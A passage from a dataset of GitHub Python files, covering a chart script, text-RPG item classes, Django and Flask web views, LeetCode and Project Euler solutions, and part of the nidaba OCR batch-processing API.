'%.2f%%')\nplt.title('Customers Visited From Channels (First Touch)')\nplt.legend()\nplt.show()\n","repo_name":"techiebro18/python-works","sub_path":"Charts/first_touch_channel_customer_visited.py","file_name":"first_touch_channel_customer_visited.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"3412550760","text":"import gameplay\nfrom core_elements import *\nfrom typing import List\n\n# DEFINES BASIC LOGICS FOR ELEMENTS AND ITEMS\n\n\nclass Element(object):\n '''\n CLASS used for all interactable elements on the game.\n '''\n\n def __init__(self, name, description):\n self.name: str = name\n self.description: str = description\n # self.looking_effect: str = None\n # self.searching_effect: List[str] = None\n # self.on_hearing = None\n # self.hearing_effect: str = None\n # self.on_touching = None\n # self.touching_effect: str = None\n # self.on_tasting = None\n # self.tasting_effect: str = None\n\n @property\n def article(self) -> str:\n if self.name.endswith('s') or self.name.endswith('food'):\n return ('', '')\n elif self.name.startswith(('a', 'e', 'i', 'o', 'u', 'y')):\n return ('an ', 'an ')\n else:\n return ('a ', 'a ')\n\n @property\n def verb(self) -> str:\n if self.name.endswith('s') or self.name.endswith('food'):\n return 'are'\n else:\n return 'is'\n\n def on_looking(self) -> None:\n '''\n If the place looked upon has visible elements (ej. apples on trees),\n the items are added to the elements List of the Scenario instance and can now be also interacted to with.\n Hidden elements should be on a Container and are only found with on_searching.\n '''\n things_saw: List = []\n\n for __item in gameplay.CURRENT_SCENARIO.elements:\n if issubclass(type(__item), Item):\n if __item.container == self.name:\n things_saw.append(__item)\n\n if len(things_saw) == 1:\n this_element = things_saw[0]\n print_cinematics(\n f'You see {this_element.article[0]}{this_element.name} on the {self.name}')\n elif len(things_saw) > 1:\n print_cinematics(\n f'You see \\\n {\", \".join(f\"{this_element.article[0]}{this_element.name}\" for item in things_saw[: -1])} \\\n and {f\"{things_saw[-1].article[0]}{things_saw[-1].name}\"} on the {self.name}.')\n\n for property_name, property_value in self.__dict__.items():\n if issubclass(type(property_value), Item) or type(property_value) == Item:\n if property_value.hidden == False:\n if not property_name in gameplay.CURRENT_SCENARIO.elements:\n print_cinematics(\n f'You see {property_value.name} on the {self.name}')\n gameplay.CURRENT_SCENARIO.add_to_elements(\n property_value)\n delattr(self, property_name)\n break\n\n def on_taking(self, callback=None) -> None:\n '''\n called when Hero takes an item with on_taking attribute.\n '''\n if callback:\n callback()\n\n\nclass Item(Element):\n '''\n CLASS used exclusively for items that can be taken and/or used by the Hero.\n '''\n\n def __init__(self, name: str, description: str, weight: int, quantity: int = 1):\n super(Item, self).__init__(name, description)\n self.usable: bool = False\n self.container: str = None\n self.hidden: bool = False\n self.unity_weight: int = weight\n self.__quantity: int = quantity\n self.weight: int = weight * quantity\n\n @property\n def verb(self) -> str:\n if type(self) == Food:\n if self.__quantity <= 1 and not self.name.endswith('food'):\n return 'look'\n else:\n return 'looks'\n else:\n if self.__quantity <= 1:\n return 'is'\n else:\n return 'are'\n\n def add(self, how_many: int = 
'countless') -> int:\n if how_many == 'countless':\n self.on_taking = lambda: 'keep'\n self.__quantity = 1\n self.name += 's'\n self.weight = self.unity_weight * self.__quantity\n else:\n self.__quantity += how_many\n self.update_quantity()\n return (self.__quantity)\n\n def remove(self, how_many: int):\n self.__quantity -= how_many\n self.update_quantity()\n return (self.__quantity)\n\n def update_quantity(self) -> None:\n self.weight = self.unity_weight * self.__quantity\n if self.__quantity <= 1 and not self.name.endswith('food'):\n if self.name[-1] == 's':\n self.name = self.name[:-1]\n elif self.__quantity > 1 and not self.name.endswith('food'):\n if self.name[-1] != 's':\n self.name = f'{self.name}s'\n self.verb\n\n @property\n def quantity(self) -> int:\n return self.__quantity\n\n\nclass Container(Element):\n '''\n CLASS used exclusively for elements that contain another elements (ej. a chest).\n '''\n\n def __init__(self, name: str, description: str):\n super(Container, self).__init__(name, description)\n\n def add_item(self, item: Item, hidden: str = None) -> None:\n if hidden == 'hidden':\n item.hidden = True\n setattr(item, 'container', self.name)\n setattr(self, item.name, item)\n\n def on_searching(self) -> None:\n '''\n If the place looked upon has hidden items,\n they are added to the Scenario instance and can now be also interacted to with.\n Visible items are not found here with on_serching, but seen with on_looking.\n '''\n if getattr(self, 'searching_effect', None):\n print_cinematics(self.searching_effect[0])\n self.searching_effect[1]()\n\n for property_name, property_value in self.__dict__.items():\n\n if issubclass(type(property_value), Item) and property_value.hidden == True:\n property_value.hidden = False\n print_cinematics(f'You find {property_value.name}')\n gameplay.CURRENT_SCENARIO.add_to_elements(property_value)\n delattr(self, property_name)\n return\n print_cinematics(\n f'You search the {self.name} but you find nothing special.')\n\n\nclass Food(Item):\n\n def __init__(self, name: str, description: str, weight: int, quantity: int = 0):\n self.description: str = description\n super(Food, self).__init__(name, self.description, weight, quantity)\n self.usable: bool = True\n\n\nclass Weapon(Item):\n '''\n CLASS used exclusively for Weapons.\n '''\n\n def __init__(self, name: str, description: str, weight: int, weapon_type: str, bonus: int):\n super(Weapon, self).__init__(name, description, weight)\n self.type: str = weapon_type\n self.bonus: str = bonus\n\n @property\n def draw_action(self) -> List[str]:\n if self.type == 'blade':\n return ['unsheathe', 'unsheathes']\n elif self.type == 'range':\n return [f'get an arrow and draw', 'gets an arrow and draws']\n elif self.type == 'blunt':\n return ['draw', 'draws']\n\n\nclass Shield(Item):\n '''\n CLASS used exclusively for Shields.\n '''\n\n def __init__(self, name: str, description: str, weight: int, bonus: int):\n super(Shield, self).__init__(name, description, weight)\n self.bonus: int = bonus\n\n\nclass Armor(Item):\n '''\n CLASS used exclusively for Armors.\n '''\n\n def __init__(self, name: str, description: str, weight: int, bonus: int):\n super(Armor, self).__init__(name, description, weight)\n self.bonus: int = bonus\n\n def on_taking(self) -> None:\n if self.container:\n print(\n f'You remove the armor from the {self.container}.')\n\n\n'''\n class Element(object):\n def __init__(self, name, description):\n self.name = name\n self.description = description\n\n on_looking =\n 'looking_effect': 
'tired'\n\n    'on_searching': 'You spend a very long time searching the bushes and start to feel tired.',\n    'searching_effect': 'tired'\n\n'''\n","repo_name":"annabranco/old-school-rpg","sub_path":"core_elements/elements/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8170,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"}
+{"seq_id":"1368086298","text":"from itertools import product\nfrom django.shortcuts import render\nfrom .models import Category,Category2\nfrom .forms import Category2Form\n\n# Create your views here.\ndef shop(request):\n    form = Category2Form(request.POST,request.FILES or None)\n    if request.method == 'POST' and form.is_valid():\n        form.save()\n    products = Category2.objects.all()\n    categories = Category.objects.all() \n    return render (request,'shop.html',{'products':products, 'categories':categories,'form':form })\n\ndef ololo(request):\n    form = Category2Form(request.POST or None)\n    category = Category2.objects.all()\n    if request.method == 'POST' and form.is_valid():\n        form.save()\n    return render (request,'shop.html',{'form':form })\n\n    \n\n","repo_name":"iskander2/magazine2","sub_path":"shop/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"75329520070","text":"from flask import render_template, redirect, g, request, jsonify, current_app, abort\n\nfrom info import constants, db\nfrom info.models import Category, News, User\nfrom info.modules.profile import profile_blu\nfrom info.utils.common import user_login_data\nfrom info.utils.image_storage import storage\nfrom info.utils.response_code import RET\n\n# User login\n# User basic info\n# Password change\n# News collection\n# Following/followers\n# News editing\n# Return the news published by a given user\n\n@profile_blu.route('/info')\n@user_login_data\ndef get_user_info():\n    \"\"\"\n    Get user info\n    1. Get the model of the currently logged-in user\n    2. Return the requested fields of the model\n    :return:\n    \"\"\"\n    user = g.user\n    if not user:\n        # User is not logged in, redirect to the home page\n        return redirect('/')\n    data = {\n        \"user\": user.to_dict(),\n    }\n    # Render the template\n    return render_template(\"news/user.html\", data=data)\n\n\n@profile_blu.route('/base_info', methods=[\"GET\", \"POST\"])\n@user_login_data\ndef base_info():\n    \"\"\"\n    User basic info\n    1. Get the user's login info\n    2. Get the incoming parameters\n    3. Update and save the data\n    4. Return the result\n    :return:\n    \"\"\"\n    # 1. Get the info of the currently logged-in user\n    user = g.user\n    if request.method == \"GET\":\n        return render_template('news/user_base_info.html', data={\"user\": user.to_dict()})\n    # A POST request means the user data is being modified\n    # 2. Get the incoming parameters\n    data_dict = request.json\n    nick_name = data_dict.get(\"nick_name\")\n    gender = data_dict.get(\"gender\")\n    signature = data_dict.get(\"signature\")\n    # Validate the parameters\n    if not all([nick_name, signature, gender]):\n        return jsonify(errno=RET.PARAMERR, errmsg=\"Invalid parameters\")\n    if gender not in (['MAN', 'WOMAN']):\n        return jsonify(errno=RET.PARAMERR, errmsg=\"Invalid parameters\")\n    # 3. Update and save the data\n    user.nick_name = nick_name\n    user.gender = gender\n    user.signature = signature\n\n    # 4. Return the response\n    return jsonify(errno=RET.OK, errmsg=\"Updated successfully\")\n\n\n@profile_blu.route('/pic_info', methods=[\"GET\", \"POST\"])\n@user_login_data\ndef pic_info():\n    user = g.user\n    if request.method == \"GET\":\n        return render_template('news/user_pic_info.html', data={\"user\": user.to_dict()})\n    # 1. Get the uploaded file\n    try:\n        avatar_file = request.files.get(\"avatar\").read()\n    except Exception as e:\n        current_app.logger.error(e)\n        return jsonify(errno=RET.PARAMERR, errmsg=\"Error reading the file\")\n\n    # 2. Then upload the file to Qiniu Cloud\n    try:\n        key = storage(avatar_file)\n    except Exception as e:\n        current_app.logger.error(e)\n        return jsonify(errno=RET.THIRDERR, errmsg=\"Error uploading the image\")\n\n    # 3. Update the avatar info on the current user's model\n\n    # Set the related data on the user model\n    user.avatar_url = key\n    # return the full avatar URL (domain prefix plus the storage key)\n    return jsonify(errno=RET.OK, errmsg=\"OK\", avatar_url=constants.QINIU_DOMIN_PREFIX + key)\n\n\n@profile_blu.route('/pass_info', methods=[\"GET\", \"POST\"])\n@user_login_data\ndef pass_info():\n    if request.method == \"GET\":\n        return render_template('news/user_pass_info.html')\n    # 1. Get the incoming parameters\n    old_password = request.json.get(\"old_password\")\n    new_password = request.json.get(\"new_password\")\n    if not all([old_password, new_password]):\n        return jsonify(errno=RET.PARAMERR, errmsg=\"Invalid parameters\")\n    # 2. Get the info of the currently logged-in user\n    user = g.user\n    if not user.check_passowrd(old_password):\n        return jsonify(errno=RET.PWDERR, errmsg=\"The old password is incorrect\")\n    # 3. Update the password\n    user.password = new_password\n    return jsonify(errno=RET.OK, errmsg=\"Saved successfully\")\n\n\n@profile_blu.route('/collection')\n@user_login_data\ndef user_collection():\n    # Get the page number\n    page = request.args.get(\"p\", 1)\n    try:\n        page = int(page)\n    except Exception as e:\n        current_app.logger.error(e)\n        page = 1\n\n    # Query the given page of the user's collected news\n    user = g.user\n    collections = []\n    current_page = 1\n    total_page = 1\n    try:\n        # Run the paginated query\n        paginate = user.collection_news.paginate(page, constants.USER_COLLECTION_MAX_NEWS, False)\n        # Get the items of this page\n        collections = paginate.items\n        # Get the current page\n        current_page = paginate.page\n        # Get the total number of pages\n        total_page = paginate.pages\n    except Exception as e:\n        current_app.logger.error(e)\n\n    # Collection list\n    collection_dict_li = []\n    for news in collections:\n        collection_dict_li.append(news.to_basic_dict())\n\n    data = {\"total_page\": total_page, \"current_page\": current_page, \"collections\": collection_dict_li}\n    return render_template('news/user_collection.html', data=data)\n\n\n@profile_blu.route('/news_release', methods=[\"GET\", \"POST\"])\n@user_login_data\ndef news_release():\n    if request.method == \"GET\":\n        categories = []\n        try:\n            # Get all category data\n            categories = Category.query.all()\n        except Exception as e:\n            current_app.logger.error(e)\n\n        # List that holds the category data\n        categories_dicts = []\n\n        for category in categories:\n            # Get the dict\n            cate_dict = category.to_dict()\n            # Append it\n            categories_dicts.append(cate_dict)\n\n        # Remove the `latest` category\n        #categories_dicts.pop(0) # original\n        # Return the content\n        return render_template('news/user_news_release.html', data={\"categories\": categories_dicts})\n\n    # POST request: publish the news\n\n    # 1. Get the submitted data\n    # Title\n    title = request.form.get(\"title\")\n    # News source\n    source = \"Personal post\"\n    # Digest\n    digest = request.form.get(\"digest\")\n    # News content\n    content = request.form.get(\"content\")\n    # Index image\n    index_image = request.files.get(\"index_image\")\n    # Category id\n    category_id = request.form.get(\"category_id\")\n    key=''\n    index_image_data=''\n    # 1.1 Check that the data is present\n    # if not all([title, source, digest, content, index_image, category_id]):\n    #     return jsonify(errno=RET.PARAMERR, errmsg=\"Invalid parameters\")\n\n    # 1.2 Validate the parameters\n    try:\n        category_id = int(category_id)\n    except Exception as e:\n        current_app.logger.error(e)\n        print('category_id is not valid')\n        print(e)\n        #return jsonify(errno=RET.PARAMERR, errmsg=\"Invalid parameters\")\n\n    # 1.2 Try to read the image\n    try:\n        index_image_data = index_image.read()\n    except Exception as e:\n        current_app.logger.error(e)\n        print('picture save fail')\n        print(e)\n        pass\n        #return jsonify(errno=RET.PARAMERR, errmsg=\"Invalid parameters\")\n\n    # 2. Upload the title image to Qiniu Cloud\n    try:\n        key = storage(index_image_data)\n    except Exception as e:\n        current_app.logger.error(e)\n        pass\n        #return jsonify(errno=RET.THIRDERR, errmsg=\"Error uploading the image\")\n\n    # 3. Initialize the news model and set the related data\n    news = News()\n    news.title = title\n    news.digest = digest\n    news.source = source\n    news.content = content\n    if key:\n        try:\n            news.index_image_url = constants.QINIU_DOMIN_PREFIX + key\n        except:\n            news.index_image_url='' \n    news.category_id = category_id\n    news.user_id = g.user.id\n    # status 1 means pending review\n    news.status = 1\n    print('ok')\n    print(news.title,news.digest,news.source,news.content)\n    # 4. Save to the database\n    try:\n        print('success')\n        db.session.add(news)\n        db.session.commit()\n        return jsonify(errno=RET.OK, errmsg=\"Published successfully, awaiting review\")\n    except Exception as e:\n        print('failure')\n        current_app.logger.error(e)\n        db.session.rollback()\n        return jsonify(errno=RET.DBERR, errmsg=\"Failed to save the data\")\n    # 5. Return the result\n    #return jsonify(errno=RET.OK, errmsg=\"Published successfully, awaiting review\")\n\n\n@profile_blu.route('/news_list')\n@user_login_data\ndef news_list():\n    page = request.args.get(\"p\", 1)\n    try:\n        page = int(page)\n    except Exception as e:\n        current_app.logger.error(e)\n        page = 1\n    user = g.user\n    news_li = []\n    current_page = 1\n    total_page = 1\n    try:\n        paginate = News.query.filter(News.user_id == user.id).paginate(page, constants.USER_COLLECTION_MAX_NEWS, False)\n        # Get the items of this page\n        news_li = paginate.items\n        # Get the current page\n        current_page = paginate.page\n        # Get the total number of pages\n        total_page = paginate.pages\n    except Exception as e:\n        current_app.logger.error(e)\n    news_dict_li = []\n    for news in news_li:\n        news_dict_li.append(news.to_review_dict())\n    data = {\"news_list\": news_dict_li, \"total_page\": total_page, \"current_page\": current_page}\n    return render_template(\"news/user_news_list.html\", data=data)\n\n\n@profile_blu.route('/user_follow')\n@user_login_data\ndef user_follow():\n    # Get the page number\n    p = request.args.get(\"p\", 1)\n    try:\n        p = int(p)\n    except Exception as e:\n        current_app.logger.error(e)\n        p = 1\n\n    user = g.user\n\n    follows = []\n    current_page = 1\n    total_page = 1\n    try:\n        paginate = user.followed.paginate(p, constants.USER_FOLLOWED_MAX_COUNT, False)\n        # Get the items of this page\n        follows = paginate.items\n        # Get the current page\n        current_page = paginate.page\n        # Get the total number of pages\n        total_page = paginate.pages\n    except Exception as e:\n        current_app.logger.error(e)\n\n    user_dict_li = []\n\n    for follow_user in follows:\n        user_dict_li.append(follow_user.to_dict())\n    data = {\"users\": user_dict_li, \"total_page\": total_page, \"current_page\": current_page}\n    return render_template('news/user_follow.html', data=data)\n\n\n@profile_blu.route('/other_info')\n@user_login_data\ndef other_info():\n    \"\"\"View another user's info\"\"\"\n    user = g.user\n    # Get the other user's id\n    other_id = request.args.get(\"user_id\")\n    if not other_id:\n        abort(404)\n    # Query the user model\n    other = None\n    try:\n        other = User.query.get(other_id)\n    except Exception as e:\n        current_app.logger.error(e)\n    if not other:\n        abort(404)\n\n    # Whether the logged-in user follows this news author\n    is_followed = False\n    if other and user:\n        if other in user.followed:\n            is_followed = True\n    data = {\n        \"user\": user.to_dict() if user else None,\n        \"other_info\": other.to_dict(),\n        \"is_followed\": is_followed\n    }\n    return render_template('news/other.html', data=data)\n\n\n@profile_blu.route('/other_news_list')\ndef other_news_list():\n    \"\"\"Return the news published by a given user\"\"\"\n    # 1. Get the parameters\n    other_id = request.args.get(\"user_id\")\n    page = request.args.get(\"p\", 1)\n\n    # 2. Validate the parameters\n    try:\n        page = int(page)\n    except Exception as e:\n        current_app.logger.error(e)\n        return jsonify(errno=RET.PARAMERR, errmsg=\"Invalid parameters\")\n\n    try:\n        other = User.query.get(other_id)\n    except Exception as e:\n        current_app.logger.error(e)\n        return jsonify(errno=RET.NODATA, errmsg=\"Database query error\")\n\n    if not other:\n        return jsonify(errno=RET.USERERR, errmsg=\"User does not exist\")\n\n    try:\n        paginate = other.news_list.paginate(page, constants.USER_COLLECTION_MAX_NEWS, False)\n        news_li = paginate.items\n        # Get the current page\n        current_page = paginate.page\n        # Get the total number of pages\n        total_page = paginate.pages\n    except Exception as e:\n        current_app.logger.error(e)\n        return jsonify(errno=RET.DBERR, errmsg=\"Data query error\")\n\n    news_dict_li = []\n\n    for news_item in news_li:\n        news_dict_li.append(news_item.to_review_dict())\n    data = {\n        \"news_list\": news_dict_li,\n        \"total_page\": total_page,\n        \"current_page\": current_page\n    }\n    return jsonify(errno=RET.OK, errmsg=\"OK\", data=data)","repo_name":"abinsun/Flask-Web","sub_path":"info/modules/profile/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11767,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"}
+{"seq_id":"20117830146","text":"# https://leetcode.com/problems/lowest-common-ancestor-of-a-binary-tree/\n\n# Definition for a binary tree node.\n# class TreeNode:\n#     def __init__(self, x):\n#         self.val = x\n#         self.left = None\n#         self.right = None\n\n\nclass Solution:\n    def lowestCommonAncestor(self, root, p, q):\n        \"\"\"\n        :type root: TreeNode\n        :type p: TreeNode\n        :type q: TreeNode\n        :rtype: TreeNode\n        \"\"\"\n        def find_common_ancestor(root):\n            # Base case\n            if not root:\n                return (False, False, None)\n\n            # Left subtree\n            (lpFound, lqFound, lca) = find_common_ancestor(root.left)\n            if lca:\n                return (True, True, lca)\n\n            # Right subtree\n            (rpFound, rqFound, rca) = find_common_ancestor(root.right)\n            if rca:\n                return (True, True, rca)\n\n            # Root\n            pFound = lpFound or rpFound or root.val == p.val\n            qFound = lqFound or rqFound or root.val == q.val\n\n            if pFound and qFound:\n                return (True, True, root)\n            else:\n                return (pFound, qFound, None)\n\n        (_, _, lca) = find_common_ancestor(root)\n        return lca\n","repo_name":"maswin/leet-code-practice","sub_path":"lowest_common_ancestor.py","file_name":"lowest_common_ancestor.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"36262448777","text":"# Completed\n\"\"\"\n    Problem 31\n    ==========\n    \n    \n    In England the currency is made up of pound, £, and pence, p, and there\n    are eight coins in general circulation:\n    \n    1p, 2p, 5p, 10p, 20p, 50p, £1 (100p) and £2 (200p).\n    \n    It is possible to make £2 in the following way:\n    \n    1×£1 + 1×50p + 2×20p + 1×5p + 1×2p + 3×1p\n    \n    How many different ways can £2 be made using any number of coins?\n    \n    \n    Answer: 142dfe4a33d624d2b830a9257e96726d\n\"\"\"\nfrom common import check\n\nPROBLEM_NUMBER = 31\nANSWER_HASH = \"142dfe4a33d624d2b830a9257e96726d\"\nCOINS = [200, 100, 50, 20, 10, 5, 2, 1]\n\ndef get_permutations(value, coins):\n    if len(coins) == 0:\n        return None\n    coin = coins[0]\n    if len(coins) == 1:\n        if value % coin == 0:\n            yield { coin : value // coin } \n        else:\n            return None\n    else:\n        amount = 0\n        while value >= 0:\n            for permutation in (p for p in get_permutations(value, coins[1:]) if p is not None):\n                permutation.update({ coin : amount })\n                yield permutation\n            amount += 1\n            value -= coin\n\nresult = len(list(get_permutations(200, COINS)))\ncheck(result, PROBLEM_NUMBER, ANSWER_HASH)\n","repo_name":"ThomasJackDalby/project-euler","sub_path":"solutions/python/031.py","file_name":"031.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"16936735576","text":"from django.urls import path, include\nfrom django.conf.urls.static import static\nfrom project import settings\nfrom . 
import views\n\nurlpatterns = [\n path(\"personal\", views.personal, name=\"personal\"),\n path(\"contact\", views.contact , name=\"contact\"),\n path(\"academy\", views.academy , name=\"academy\"),\n path(\"document\", views.document , name=\"document\"),\n path(\"wishlist\", views.wishlist , name=\"wishlist\"),\n path(\"sgnin\", views.sgnin , name=\"sgnin\"),\n path(\"students\", views.students ,name=\"students\"),\n path(\"studentsdesirs\", views.studentsdesirs ,name=\"studentsdesirs\"),\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL,document_root=settings.MEDIA_ROOT)","repo_name":"abd-naj/test-django","sub_path":"pages/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"72834113991","text":"# -*- coding: utf-8 -*-\n\"\"\"\nnidaba.nidaba\n~~~~~~~~~~~~~\n\nThe public API of nidaba. External applications should exclusively use the\nobjects and methods defined here.\n\"\"\"\n\nfrom __future__ import unicode_literals, print_function, absolute_import\n\nfrom nidaba.nidabaexceptions import (NidabaInputException,\n NidabaNoSuchAlgorithmException,\n NidabaTickException, NidabaStepException)\n\nfrom celery import chord, chain\nfrom inspect import getcallargs\nfrom collections import OrderedDict, Iterable\nfrom requests_toolbelt.multipart import encoder\nfrom redis import WatchError\n\nimport os\nimport json\nimport uuid\nimport requests\nimport itertools\n\n\ndef task_arg_validator(arg_values, **kwargs):\n \"\"\"\n Validates keyword arguments against the list of valid argument values\n contained in the task definition.\n\n Raises:\n NidabaInputException if validation failed.\n \"\"\"\n kwc = kwargs.copy()\n\n def _val_single_arg(arg, type):\n if type == 'float':\n if not isinstance(val, float) and not isinstance(val, int):\n raise NidabaInputException('{} is not a float'.format(val))\n elif type == 'int':\n if not isinstance(val, int):\n raise NidabaInputException('{} is not an int'.format(val))\n elif type == 'str':\n if not isinstance(val, basestring):\n raise NidabaInputException('{} is not a string'.format(val))\n # XXX: Add file/files checker for local case\n elif type == 'file':\n pass\n elif type == 'files':\n pass\n else:\n raise NidabaInputException('Argument type {} unknown'.format(type))\n\n for k, v in arg_values.iteritems():\n try:\n val = kwc.pop(k)\n except:\n raise NidabaInputException('Missing argument: {}'.format(k))\n if isinstance(v, tuple):\n if not isinstance(val, type(v[0])):\n raise NidabaInputException('{} of different type than range fields'.format(val))\n if val < v[0] or val > v[1]:\n raise NidabaInputException('{} outside of allowed range {}-{}'.format(val, *v))\n elif isinstance(v, list):\n if isinstance(val, Iterable) and not isinstance(val, basestring):\n va = set(val)\n else:\n va = set([val])\n if not set(v).issuperset(va):\n raise NidabaInputException('{} not in list of valid values'.format(val))\n else:\n _val_single_arg(val, v)\n\n if kwc:\n raise NidabaInputException('Superfluous arguments present')\n\n\nclass Batch(object):\n\n \"\"\"\n Creates a series of celery tasks OCRing a set of documents (among other\n things).\n\n \"\"\"\n\n def __init__(self, id=None):\n # stuff depending on a valid configuration\n from nidaba import storage\n from nidaba import config\n self.storage = storage\n\n # slowly importing stuff\n from nidaba import tasks\n from nidaba import plugins\n from nidaba import celery\n 
self.task_reg = tasks\n self.celery = celery\n\n self.id = id\n if self.id is None:\n self.id = uuid.uuid4().get_hex()\n self.storage.prepare_filestore(self.id)\n if not self.storage.is_valid_job(self.id):\n raise NidabaInputException('Storage not prepared for task')\n\n self.docs = []\n self.scratchpad = {}\n self.redis = config.Redis\n\n self.tasks = OrderedDict([('img', []),\n ('binarize', []),\n ('segmentation', []),\n ('ocr', []),\n ('stats', []),\n ('postprocessing', []),\n ('output', []),\n ('archive', [])])\n\n # defines if tasks in a group are run in parallel or in sequence and their merge mode\n self.order = {'img': ('sequence', False),\n 'binarize': ('parallel', False),\n 'segmentation': ('parallel', False),\n 'ocr': ('parallel', False),\n 'stats': ('parallel', False),\n 'postprocessing': ('sequence', 'doc'),\n 'output': ('sequence', False),\n 'archive': ('parallel', True)}\n\n self.lock = False\n with self.redis.pipeline() as pipe:\n while(1):\n try:\n pipe.watch(self.id)\n self._restore_and_create_scratchpad(pipe)\n if 'scratchpad' not in self.scratchpad:\n self.lock = True\n pipe.execute()\n break\n except WatchError:\n continue\n\n def _restore_and_create_scratchpad(self, pipe):\n \"\"\"\n Restores the scratchpad or creates one if none exists. Does not create\n a scratchpad on an already executed task.\n \"\"\"\n scratch = pipe.get(self.id)\n if scratch is not None:\n scratch = json.loads(scratch)\n if 'scratchpad' in scratch:\n self.scratchpad = scratch\n for k, v in self.scratchpad['scratchpad'].iteritems():\n setattr(self, k, v)\n # reorder task definitions\n else:\n self.scratchpad = {'scratchpad': {'docs': self.docs,\n 'tasks': self.tasks}}\n pipe.set(self.id, json.dumps(self.scratchpad))\n\n def get_state(self):\n \"\"\"\n Retrieves the current state of a batch.\n\n Returns:\n (unicode): A string containing one of the following states:\n\n NONE: The batch ID is not registered in the backend.\n FAILURE: Batch execution has failed.\n PENDING: The batch is currently running.\n SUCCESS: The batch has completed successfully.\n \"\"\"\n batch = self.redis.get(self.id)\n try:\n batch = json.loads(batch)\n except Exception:\n return u'NONE'\n if 'scratchpad' in batch:\n return u'NONE'\n st = 'SUCCESS'\n for subtask in batch.itervalues():\n if subtask['state'] == 'PENDING' or subtask['state'] == 'RUNNING':\n st = u'PENDING'\n if subtask['state'] == 'FAILURE':\n return u'FAILURE'\n return st\n\n def get_errors(self):\n \"\"\"\n Retrieves all errors of the batch.\n\n Returns:\n list: A list of tuples containing keyword arguments to the task, a\n dictionary containing debug tracking information (i.e. 
variables\n which are given to the tasks as keyword arguments but aren't\n arguments to the underlying function), and the exception message of\n the failure.\n \"\"\"\n batch = self.redis.get(self.id)\n try:\n batch = json.loads(batch)\n except:\n return None\n errors = []\n for subtask in batch.itervalues():\n if subtask['state'] == 'FAILURE':\n errors.append(subtask)\n return errors\n\n def get_results(self):\n \"\"\"\n Retrieves the storage tuples of a successful batch.\n\n Returns:\n \"\"\"\n batch = self.redis.get(self.id)\n try:\n batch = json.loads(batch)\n except Exception:\n return None\n\n outfiles = []\n for subtask in batch.itervalues():\n if len(subtask['children']) == 0 and subtask['result'] is not None:\n outfiles.append((subtask['result'], subtask['root_documents']))\n return outfiles\n\n def get_extended_state(self):\n \"\"\"\n Returns extended batch state information.\n\n Returns:\n A dictionary containing an entry for each subtask.\n \"\"\"\n state = json.loads(self.redis.get(self.id))\n if 'scratchpad' in state:\n return []\n else:\n return state\n\n def get_available_tasks(self):\n \"\"\"\n Returns all available tasks and their valid argument values.\n\n The return value is an ordered dictionary containing an entry for each\n group with a sub-dictionary containing the task identifiers and valid\n argument values.\n \"\"\"\n tasks = OrderedDict()\n for task, fun in self.celery.app.tasks.iteritems():\n try:\n _, group, method = task.split('.')\n except:\n continue\n if group == 'util':\n continue\n if group not in tasks:\n tasks[group] = {}\n kwargs = fun.get_valid_args()\n tasks[group][method] = kwargs\n return tasks\n\n def get_tasks(self):\n \"\"\"\n Returns the simplified task definition either from the scratchpad or\n from the pipeline when already in execution.\n \"\"\"\n entry = json.loads(self.redis.get(self.id))\n if 'scratchpad' in entry:\n scratch = json.loads(self.redis.get(self.id))\n if 'simple_tasks' in scratch['scratchpad']:\n return scratch['scratchpad']['simple_tasks']\n else:\n return {}\n else:\n state = self.get_extended_state()\n tasks = OrderedDict([('img', []),\n ('binarize', []),\n ('segmentation', []),\n ('ocr', []),\n ('stats', []),\n ('postprocessing', []),\n ('output', []),\n ('output', [])])\n\n for task in state.itervalues():\n if task['task'][0] in tasks:\n tasks[task['task'][0]].append(task['task'])\n return tasks\n\n def get_documents(self):\n \"\"\"\n Returns the list of input document for this task.\n \"\"\"\n entry = json.loads(self.redis.get(self.id))\n if 'scratchpad' in entry:\n return entry['scratchpad']['docs']\n else:\n state = self.get_extended_state()\n docs = []\n for task in state.itervalues():\n for doc in task['root_documents']:\n if doc not in docs and isinstance(doc[0], basestring):\n docs.append(doc)\n return docs\n\n def is_running(self):\n \"\"\"\n Returns True if the batch's run() method has been successfully called, otherwise False.\n \"\"\"\n return self.lock\n\n def add_document(self, doc):\n \"\"\"Add a document to the batch.\n\n Adds a document tuple to the batch and checks if it exists.\n\n Args:\n doc (tuple): A standard document tuple.\n\n Raises:\n NidabaInputException: The document tuple does not refer to a file.\n \"\"\"\n if self.lock:\n raise NidabaInputException('Executed batch may not be modified')\n\n if not self.storage.is_file(*doc):\n raise NidabaInputException('Input document is not a file.')\n\n with self.redis.pipeline() as pipe:\n while(1):\n try:\n pipe.watch(self.id)\n 
